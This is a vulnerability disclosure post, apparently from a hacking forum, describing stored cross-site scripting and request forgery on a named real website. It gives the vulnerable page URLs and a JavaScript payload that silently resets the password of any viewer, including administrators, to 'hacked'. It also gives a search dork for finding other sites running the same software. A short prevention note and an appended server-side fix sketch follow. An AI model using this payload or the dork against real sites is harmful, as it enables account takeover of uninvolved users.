http://www.csice.org/ suffers from XSS and CSRF (cross-site scripting and cross-site request forgery) attacks.

The vulnerability lies in the post-comment fields of the following page, which is only for authenticated users. Move to http://www.csice.org/student/subjects.html, choose a subject, and go to http://www.csice.org/student/LessonPosting/59/0/view_units.html

Users are allowed to post comments there, but the comments are not filtered, possibly allowing anyone to inject scripts too. For example, we could update a post with a comment like which will get updated in the database, and the next time someone views the page, that page will show a JavaScript alert.

This attack could be taken to another extent. Now that we can run JavaScript on the client side, we may build a script which, when run, will change the user's password to a new value. All we have to do is update the code in the comment field, and when some other user views the page the change-password script will get executed and his or her password will be changed.

Consider for example: post a comment with this

What sas.js does is change the user's password to 'hacked' when run on the victim:

    // createAjaxObject() is not defined in this post
    var pass_req = createAjaxObject();
    var data = 'hacked';
    alert(data);
    // The request carries only the new value in the "data" field
    pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");
    pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    pass_req.send("data="+data);

So using this hack we could change any user's or administrator's password to a new value.

I am not able to figure out what CMS this site runs on, but it surely is an open source CMS; see inurl:ajax_redirect.php?page= and you could see a lot of results.

Filtering the input will be the way to prevent these issues. Have a look at our website and this paper on how to prevent such attacks: http://www.whitec0de.com/paper/0121

love
FB1H2S
Hacking is a matter of time, knowledge and patience
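
A sketch of the server-side fix for the two issues described above, as an added example that is not the site's code and not part of the original post: encode comment text when it is rendered, and make the change-password request require a per-session token and the current password. The function names, the session and form fields and the `users` map are assumptions for illustration.

```javascript
const crypto = require('crypto');

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode stored comment text at output time so markup in it renders as text.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constant-time comparison; lengths are compared first.
function safeEqual(a, b) {
  const x = Buffer.from(a), y = Buffer.from(b);
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

function hashPassword(password, salt) {
  return crypto.scryptSync(password, salt, 32);
}

// Hypothetical handler for the change-password request.
// session: { user, csrfToken }  form: { csrfToken, currentPassword, newPassword }
// users: Map of user name -> { salt, hash }
function changePassword(session, form, users) {
  // A request forged from another site cannot read the per-session token.
  if (!form.csrfToken || !safeEqual(form.csrfToken, session.csrfToken)) {
    return { ok: false, reason: 'bad csrf token' };
  }
  // Script injected into the same origin can read the token, so the handler
  // also demands the current password, which that script does not have.
  const account = users.get(session.user);
  if (!account || !form.currentPassword ||
      !safeEqual(hashPassword(form.currentPassword, account.salt), account.hash)) {
    return { ok: false, reason: 'current password required' };
  }
  if (!form.newPassword) return { ok: false, reason: 'new password missing' };
  account.salt = crypto.randomBytes(16);
  account.hash = hashPassword(form.newPassword, account.salt);
  return { ok: true };
}

// Constructed sample data: one account and a request that carries only a new value.
function demo() {
  const salt = crypto.randomBytes(16);
  const users = new Map([['alice', { salt, hash: hashPassword('old-pass', salt) }]]);
  const session = { user: 'alice', csrfToken: crypto.randomBytes(16).toString('hex') };
  console.log(escapeHtml('<b>comment</b>'));
  console.log(changePassword(session, { newPassword: 'x' }, users));
}
demo();
```
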